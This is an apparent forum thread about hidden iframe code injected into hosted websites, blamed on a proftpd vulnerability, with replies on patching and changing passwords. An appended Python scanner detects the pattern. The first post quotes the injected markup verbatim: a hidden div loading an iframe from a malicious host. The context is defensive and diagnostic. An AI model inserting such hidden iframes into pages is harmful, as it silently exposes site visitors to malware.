Not sure if this is in the right place but anyway........

A load of sites I help maintain have been having code added to them.

<div style="display:none"><iframe width=438 height=168 src="http://deathtesting.  ru:8080/index.php" ></iframe></div>

Normally with a load of random divs as well.

I have found out from a random Lithuanian site that this is a proftpd service vulnerability.

Google has flagged the sites and is displaying warnings that our site may contain malware.

Any ideas how to get rid of it?

We are currently changing our FTP and control panel codes, and I will get rid of the code and re-upload again and see if that works, but is there anything else that can be done?

The sites are hosted on 1&1 if that makes any difference.

Have tried removing the code and re-uploading.

Until you can verify that the proftpd application has been patched you should disable it. The Fedora update for proftpd was published on the 24th. It may already be in place on your hosting service.


Things are okay now; just changed the FTP and control panel codes and re-uploaded everything and it seems to be fine.


When you say you changed the FTP and control panel codes I am not sure what you mean. Did you mean you changed the passwords?
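
An added example, not part of the thread: a Python check for the kind of markup quoted in the first post (an iframe wrapped in a container hidden with inline CSS), meant to be run over a local copy of a site before it is re-uploaded. The function names, the extension list and the sample page with its placeholder hosts are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# A container hidden with inline CSS that directly wraps an <iframe>:
# the shape of the injected markup quoted in the first post.
HIDDEN_IFRAME = re.compile(
    r"<(?:div|span)\b[^>]*style\s*=\s*[\"'][^\"']*"
    r"(?:display\s*:\s*none|visibility\s*:\s*hidden)[^\"']*[\"'][^>]*>"
    r"\s*<iframe\b[^>]*\bsrc\s*=\s*[\"']?\s*([^\"'\s>]+)",
    re.IGNORECASE,
)
WEB_EXTENSIONS = {".html", ".htm", ".php", ".js", ".tpl", ".inc"}  # assumed list

def find_hidden_iframes(text):
    """Return (line_number, iframe_src) for each hidden-container iframe in text."""
    hits = []
    for m in HIDDEN_IFRAME.finditer(text):
        line = text.count("\n", 0, m.start()) + 1
        hits.append((line, m.group(1)))
    return hits

def scan_tree(root):
    """Scan web files under root; return {path: [(line, src), ...]} for files with hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample: one legitimate visible iframe, one injected hidden one.
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe width="560" height="315" src="https://video.example.org/embed/1"></iframe>
<div style="display:none"><iframe width=438 height=168 src="http://injected.example.invalid:8080/index.php" ></iframe></div>
</body></html>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for file, hits in scan_tree(sys.argv[1]).items():
            for line, src in hits:
                print(f"{file}:{line}: hidden iframe -> {src}")
    else:
        print(find_hidden_iframes(SAMPLE))
```

Run it with the site directory as the only argument; every reported file should be compared against a known-good copy before it goes back on the server.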

